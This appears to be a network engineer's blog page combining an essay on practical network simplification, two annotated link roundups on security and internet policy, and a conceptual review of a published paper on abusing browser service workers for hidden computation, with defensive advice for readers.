Posts by Russ

Practical Simplification

Simplification is a constant theme not only here, and in my talks, but across the network engineering world right now. But what does this mean practically? Looking at a complex network, how do you begin simplifying?

The first option is to abstract, abstract again, and abstract some more. But before diving into deep abstraction, remember that abstraction is both a good and bad thing. Abstraction can reduce the amount of state in a network, and reduce the speed at which that state changes. Abstraction can cover a multitude of sins in the legacy part of the network, but abstractions also leak!!! In fact, all nontrivial abstractions leak. Following this logic through: all non-trivial abstractions leak; the more non-trivial the abstraction, the more it will leak; the more complexity an abstraction is covering, the less trivial the abstraction will be. Hence: the more complexity you are covering with an abstraction, the more it will leak.

Abstraction, then, is only one part of the solution. You must not only abstract, but you must also simplify the underlying bits of the system you are covering with the abstraction. This is a point we often miss.

Which returns us to our original question. The first answer to the question is this: minimize.

Minimize the number of technologies you are using. Of course, minimization is not so … simple … because it is a series of tradeoffs. You can minimize the number of protocols you are using to build the network, or you can minimize the number of things you are using each protocol for. This is why you layer things, which helps you understand how and where to modularize, focusing different components on different purposes, and then thinking about how those components interact. Ultimately, what you want is precisely the number of modules required to do the job to a specific level of efficiency, and not one module more (or less).

Minimize the kinds of “things” you are using. Try to use one data center topology, one campus topology, one regional topology, etc. Try to use one kind of device (whether virtual or physical) in each “role.” Try to reduce the number of “roles” in the network.

Think of everything, from protocols to “places,” as “modules,” and then try to reduce the number of modules. Modules should be chosen for repeatability, functional division, and optimal abstraction.

The second answer to the original question is: architecture should move slowly, components quickly.

The architecture is not the network, nor even the combination of all the modules.

Think of a building. Every building has bathrooms (I assume). All those bathrooms have sinks (I assume). The sinks need to fit the style of the building. The number of sinks need to match the needs of the building overall. But—the sinks can change rapidly, and in response to the changing architecture of the building, but the building, it’s purpose, and style, change much more slowly. Architecture should change slowly, components more rapidly.

This is another reason to create modules: each module can change as needed, but the architecture of the overall system needs to change more slowly and intentionally. Thinking in systemic terms helps differentiate between the architecture and the components. Each component should fit within the overall architecture, and each component should play a role in shaping the architecture. Does the organization you support rely on deep internal communication across a wide geographic area? Or does it rely on lots of smaller external communications across a narrow geographic area? The style of communication in your organization makes a huge difference in the way the network is built, just like a school or hospital has different needs in terms of sinks than a shopping mall.

So these are, at least, two rules for simplification you can start thinking about how to apply in practical ways: modularize, choose modules carefully, reduce the number of the kinds of modules, and think about what things need to change quickly and what things need to change slowly.

Throwing abstraction at the problem does not, ultimately, solve it. Abstraction must be combined with a lot of thinking about what you are abstracting and why.

Weekend Reads 041919

A cybersecurity professional today demonstrated a long-known unpatched weakness in Microsoft’s Azure cloud service by exploiting it to take control over Windows Live Tiles, one of the key features Microsoft built into Windows 8 operating system. —Mohit Kumar

A team of security researchers on Wednesday issued a stern warning about a DNS Hijacking campaign being carried out by an advanced, state-sponsored actor believed to be targetting sensitive networks and systems. —CircleID

Security researchers say they have found a new victim of the hacking group behind the potentially destructive malware, which targets critical infrastructure, known as Triton or Trisis. —Lorenzo Franceschi-Bicchierai

By pushing client-side DNS queries into HTTPS the Internet itself has effectively lost control of the client end of DNS, and each and every application, including the vast array of malware, can use DOH and the DNS as a command and control channel in a way that is undetectable by the client or client’s network operator. —Geoff Huston

The expectations are often high, not only for the MDM solutions ability to massively reduce the administrative workload of keeping track, updating and managing the often hundreds or thousands of devices within a company but also regarding the improvements towards the level of security that an MDM solution is regularly advertised to provide. —Florian Kiersch

But this is only the most obvious manifestation of Chinese maritime strategy. Another key element, one that’s far harder to discern, is Beijing’s increasing influence in constructing and repairing the undersea cables that move virtually all the information on the internet. To understand the totality of China’s “Great Game” at sea, you have to look down to the ocean floor. —James Stavridis

As governments across the world have awoken to the immensely disruptive power of the internet, they have moved swiftly to contain and shape its forces in ways that mirror their national interests. —Kalev Leetaru

He turned up some significant results that contributed to the ethos of the time: your personality is baked into who you are and is probably secretly determining many of your choices in life. Your job is to discover your personality and then find the right role for yourself in life so that you can find happiness without doing violence to your true self. (Remember how they wrote “never change” in your yearbook?) —Jeffrey A. Tucker

There are many ways to think about where your data is stored. The most popular today are centralized vs decentralized, and the other is where the borders are. Today, I’ll only discuss the latter. —Kris Constable

But by the end, I realized I disagree deeply with Medium about the ethics of design. And by ethics, I mean something simple: though Medium and I are both making tools for writers, what I want for writers and what Medium wants couldn’t be more different. Medium may be avoiding what made the typewriter bad, but it’s also avoiding what made it good. Writers who are tempted to use Medium—or similar publishing tools—should be conscious of these tradeoffs. —Matthew Butterick

Why You Should Block Notifications and Close Your Browser

Every so often, while browsing the web, you run into a web page that asks if you would like to allow the site to push notifications to your browser. Apparently, according to the paper under review, about 12% of the people who receive this notification allow notifications. What, precisely, is this doing, and what are the side effects?

Papadopoulos, Panagiotis, Panagiotis Ilia, Michalis Polychronakis, Evangelos P. Markatos, Sotiris Ioannidis, and Giorgos Vasiliadis. “Master of Web Puppets: Abusing Web Browsers for Persistent and Stealthy Computation.” In Proceedings 2019 Network and Distributed System Security Symposium. San Diego, CA: Internet Society, 2019. https://doi.org/10.14722/ndss.2019.23070.

Allowing notifications allows the server to kick off one of two different kinds of processes on the local computer, a service worker. There are, in fact, two kinds of worker apps that can run “behind” a web site in HTML5; the web worker and the service worker. The web worker is designed to calculate or locally render some object that will appear on the site, such as unencrypting a downloaded audio file for local rendition. This moves the processing load (including the power and cooling use!) from the server to the client, saving money for the hosting provider, and (potentially) rendering the object in question more quickly.

A service worker, on the other hand, is designed to support notifications. For instance, say you keep a news web site open all day in your browser. You do not necessarily want to reload the page ever few minutes; instead, you would rather the site send you a notification through the browser when some new story has been posted. Since the service worker is designed to cause an action in the browser on receiving a notification from the server, it has direct access to the network side of the host, and it can run even when the tab showing the web site is not visible.

In fact, because service workers are sometimes used to coordinate the information on multiple tabs, a service worker can both communicate between tabs within the same browser and stay running in the browser’s context even though the tab that started the service worker is closed. To make certain other tabs do not block while the server worker is running, they are run in a separate thread; they can consume resources from a different core in your processor, so you are not aware (from a performance perspective) they are running. To sweeten the pot, a service worker can be restarted after your browser has restarted by a special push notification from the server.

If a service worker sounds like a perfect setup for running code that can mine bitcoins or launch DDoS attacks from your web browser, then you might have a future in computer security. This is, in fact, what MarioNet, a proof-of-concept system described in this paper, does—it uses a service worker to consume resources off as many hosts as it can install itself on to do just about anything, including launching a DDoS attack.

Given the above, it should be simple enough to understand how the attack works. When the user lands on a web page, ask for permission to push notifications. A lot of web sites that do not seem to need such permission ask now, particularly ecommerce sites, so the question does not seem out of place almost anywhere any longer. Install a service worker, using the worker’s direct connection to the host’s network to communicate to a controller. The controller can then install code to be run into the service worker and direct the execution of that code. If the user closes their browser, randomly push notifications back to the browser, in case the user opens it again, thus recreating the service worker.

Since the service worker runs in a separate thread, the user will not notice any impact on web browsing performance from the use of their resources—in fact, MarioNet’s designers use fine-grained tracking of resources to ensure they do not consume enough to be noticed. Since the service worker runs between the browser and the host operating system, no defenses built into the browser can detect the network traffic to raise a flag. Since the service worker is running in the context of the browser, most anti-virus software packages will give the traffic and processing a pass.

Lessons learned?

First, making something powerful from a compute perspective will always open holes like this. There will never be any sort of system that both allows the transfer of computation from one system to another that will not have some hole which can be exploited.

Second, abstraction hides complexity, even the complexity of an attack or security breach, nicely. Abstraction is like anything else in engineering: if you haven’t found the tradeoffs, you haven’t looked hard enough.

Third, close your browser when you are done. The browser is, in many ways, an open door to the outside world through which all sorts of people can make it into your computer. I have often wanted to create a VM or container in which I can run a browser from a server on the ‘net. When I’m done browsing, I can shut the entire thing down and restore the state to “clean.” No cookies, no java stuff, no nothing. A nice fresh install each time I browse the web. I’ve never gotten around to building this, but I should really put it on my list of things to do.

Fourth, don’t accept inbound connection requests without really understanding what you are doing. A notification push is, after all, just another inbound connection request. It’s like putting a hole in your firewall for that one FTP server that you can’t control. Only it’s probably worse.

Weekend Reads 041119

Since at least the middle of the last century, the question of how to get employees to improve has generated a good deal of opinion and research. —Marcus Buckingham and Ashley Goodall

Should the IETF publish standard specifications of technologies that facilitate third-party eavesdropping on communications or should it refrain from working on such technologies? —Geoff Huston

n February, the company announced its intention to move forward with the development of the Curie cable, a new undersea line stretching from California to Chile. It will be the first private intercontinental cable ever built by a major non-telecom company. Tyler Cooper—

You have your morning coffee in hand, you’ve just finished your daily scrum, and you sit down at your computer to start your day. Up pops a Slack message. You scan your emails, then bounce back to Slack. —Sarah Wall

“Open core” evolved as one of the primary ways for companies that maintain an open source project to make money. They offer a product that at the “core” is the open source project, but with features that only paying customers have access too. MongoDB and Elastic, —Eric Anderson

EU antitrust regulators should consider forcing tech giants such as Google and Amazon to share their data with rivals rather than break them up, three academics enlisted by the European Commission said on Thursday. —Foo Yun Chee

For some of us, myself included, the sounds of old Office reruns are a nightly lullaby that help put us to sleep. Or so we think. As it turns out, the streaming content that plays while you slumber isn’t as harmless as we’d hope. —Stan Horaczek

Stefan Tanase, principal security researcher at Ixia, told Ars that the DNS servers described in this article were taken down and that the attackers have replaced them with new DNS servers. Ixia analyzed the rogue DNS server and found it targets the following domains: GMail.com, PayPal.com, Netflix.com, Uber.com, caix.gov.br, itau.com.br, bb.com.br, bancobrasil.com.br, sandander.com.br, pagseguro.uol.com.br, sandandernet.com.br, cetelem.com.br, and possibly other sites. —Dan Goodin

As an industry, we also don’t talk often enough about the cybersecurity threats that face domain name Registries — and the work we do to mitigate this — until it’s too late. —Nicolai Bezsonoff

As far as I know, OneWeb is still planning to offer service in Russia, but they have had to make financial and technical concessions. They agreed to become a minority partner in the company that will market their service in Russia and, significantly, they agreed to drop the inter-satellite laser links (ISLLs) from their constellation and pass all Russian traffic through ground stations in Russia. —Larry Press

Intel today launched a barrage of new products for the data center, tackling almost every enterprise workload out there. The company’s diverse range of products highlights how today’s data center is more than just processors, with network controllers, customizable FPGAs, and edge device processors all part of the offering. —Peter Bright